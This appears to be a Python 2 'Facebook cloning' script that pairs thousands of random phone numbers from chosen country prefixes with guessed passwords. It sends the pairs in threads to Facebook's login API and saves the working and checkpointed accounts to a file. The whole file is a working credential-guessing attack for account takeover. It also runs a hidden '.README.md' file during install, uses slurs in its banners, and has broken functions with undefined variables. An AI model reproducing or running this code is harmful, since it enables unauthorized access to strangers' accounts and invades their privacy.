# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print nmbr

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    os.system('pkg install nodejs')
    time.sleep(1)
    os.system('python2 .README.md')
    

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser

reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
session = requests.Session()
session.headers.update({'User-Agent': 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]'})

def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')
def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"



##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    os.system('toilet -f big \\S O  M I/ -F gay')
    print " \033[1;96m  ╔═══════════════╗"
    print "\033[1;96m   |\033[1;97mWITHOUT LOGIN \033[1;96m |"
    print " \033[1;96m  ╚═══════════════╝"
    print"\033[1;92m1.\033[1;97m├\033[1;93m PAKISTAN WITHOUT LOGIN"
    print"\033[1;92m2.\033[1;97m├\033[1;93m INDIA WITHOUT LOGIN"
    print"\033[1;92m3.\033[1;97m├\033[1;93m USA WITHOUT LOGIN"
    print"\033[1;92m4.\033[1;97m├\033[1;93m SAUDIA WITHOUT LOGIN"
    print"\033[1;92m5.\033[1;97m├\033[1;93m INDONESIA WITHOUT LOGIN"
    print"\033[1;92m6.\033[1;97m├\033[1;93m BRAZIL WITHOUT LOGIN"
    print"\033[1;92m7.\033[1;97m├\033[1;93m CHINA WITHOUT LOGIN"
    print"\033[1;92m8.\033[1;97m├\033[1;93m SPAIN WITHOUT LOGIN"
    print"\033[1;92m9.\033[1;97m├\033[1;93m POLAND WITHOUT LOGIN"
    print"\033[1;92m10.\033[1;97m├\033[1;93m U-A-E WITHOUT LOGIN"
    pilih_login()

def pilih_login():
    bch = raw_input('\n\n \x1b[1;96m>   ')
    if bch == '':
        print '[!] Fill in correctly'
        pilih_login()
    elif bch == '1':
        os.system('clear')
        os.system('toilet -f big pakistan -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 00 to 09")
        jalan("\033[1;95m[+] 11 to 18")
        jalan("\033[1;95m[+] 21 to 24")
        jalan("\033[1;95m[+] 30 to 36")
        jalan("\033[1;95m[+] 40 to 49")
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+923"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
 
    elif bch == '2':
        tik()
        os.system('clear')
        os.system('toilet -f big india -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 905,975,755,855,")
        jalan("\033[1;95m[+] 954,897,967,937")
        jalan("\033[1;95m[+] 700,727,965,786,")
        jalan("\033[1;95m[+] 874,856,566,590 ")
        jalan("\033[1;95m[+] 527,568, 578")
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+91"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '3':
        tik()
        os.system('clear')
        os.system('toilet -f big U S A-F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 555,786, 815, 315, 256, ")
        jalan("\033[1;95m[+] 401, 718, 917, 202, 701,")
        jalan("\033[1;95m[+] 303, 703, 803, 999, 708,")
        jalan("\033[1;95m[+] 559, 310, 809, 551")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+1"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '4':
        tik()
        os.system('clear')
        os.system('toilet -f big Saudia -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 50,51,52")
        jalan("\033[1;95m[+] 53,54,55")
        jalan("\033[1;95m[+] 56,57,58")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+966"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '5':
        tik()
        os.system('clear')
        os.system('toilet -f big Indonesia -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 786,815,315,256,401")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+1"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '6':
        tik()
        os.system('clear')
        os.system('toilet -f big  Brazil -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 127, 179, 117, 853, 318")
        jalan("\033[1;95m[+]  219, 834, 186, 479, 113")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+55"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '7':
        tik()
        os.system('clear')
        os.system('toilet -f big China -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 1355,")
        jalan("\033[1;95m[+] 1555")
        jalan("\033[1;95m[+] 1855")
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+86"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '8':
        tik()
        os.system('clear')
        os.system('toilet -f big Spain -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 655,755,60, 76, 73, 64, ")
        jalan("\033[1;95m[+] 69, 77, 65, 61, 75, 68")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+34"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '9':
        tik()
        os.system('clear')
        os.system('toilet -f big Poland -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 72, 67, 53, 51")
        jalan("\033[1;95m[+] 66, 69, 78, 79, 60")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+48"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '10':
        tik()
        os.system('clear')
        os.system('toilet -f big U-A-E -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 50,55,58,54,56")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+971"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    else:
        print '[!] WARNING STAR BOY'
        action()
    somi = raw_input('\x1b[1;97m Type Any Password No1: ')
    somii = raw_input('\x1b[1;97m Type Any Password No2: ')
    somiii = raw_input('\x1b[1;97m Type Any Password No3: ')
    somiiii = raw_input('\x1b[1;97m Type Any Password No4: ')
    jalan("\033[1;93m⊰═════════════════════════════════════════════⊱")
    jalan("\033[1;91m\033[1;33m             │\033[1;92m TOUR TOUCH SKY \033[1;93m│          \033[1;0m")
    jalan("\033[1;93m⊰═════════════════════════════════════════════⊱")
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = somi
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Enjoy)  ' + k + c + user + '  |  ' + pass1                                       
                okb = open('save/cloned.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m(OHH NO) ' + k + c + user + '  |  ' + pass1
                    cps = open('save/cloned.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = somii
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m(Enjoy)  ' + k + c + user +  '  |  ' + pass2
                        okb = open('save/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;97m(OHH NO) ' + k + c + user + '  |  ' + pass2
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3= somiii
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;93m(Enjoy)  ' + k + c + user + '  |  ' + pass3
                                okb = open('save/cloned.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;97m(OHH NO) ' + k + c + user + '  |  ' + pass3 
                                    cps = open('save/cloned.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                else:
                                    pass4= somiiii
                                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;93m(Enjoy)  ' + k + c + user + '  |  ' + pass4 
                                        okb = open('save/cloned.txt', 'a')
                                        okb.write(k+c+user+pass4+'\n')
                                        okb.close()
                                        oks.append(c+user+pass4)
                                    else:
                                        if 'www.facebook.com' in q['error_msg']:
                                            print '\033[1;97m(OHH NO) ' + k + c + user + '  |  ' + pass4
                                            cps = open('save/cloned.txt', 'a')
                                            cps.write(k+c+user+pass4+'\n')
                                            cps.close()
                                            cpb.append(c+user+pass4)
                                        else:
                                            pass5= nn
                                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;93m(Enjoy)  ' + k + c + user + '  |  ' + pass5
                                                okb = open('save/cloned.txt', 'a')
                                                okb.write(k+c+user+pass5+'\n')
                                                okb.close()
                                                oks.append(c+user+pass5)
                                            else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                    print '\033[1;97m(OHH NO) ' + k + c + user + '  |  ' + pass5 
                                                    cps = open('save/cloned.txt', 'a')
                                                    cps.write(k+c+user+pass5+'\n')
                                                    cps.close()
                                                    cpb.append(c+user+pass5)
                                                                                                                                                                                                                
                                                                                                                                                                                                                
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            


                                                                                                                                                                                                            
                                                                                                                                                                                                                    
                                                                                                                                                                                                            



        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 50* '\033[1;91m-'
    print 'Process Has Been Completed ...'
    print 'Total Online/ : '+str(len(oks))+'\n'+str(len(cpb))
    print('Cloned Accounts Has Been Saved : save/cloned.txt')
    jalan("Note : Your Offline account Will Open after 10 to 20 days")
    print ''
    print """
    ███



"""

    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          

          
if __name__ == '__main__':
    login()

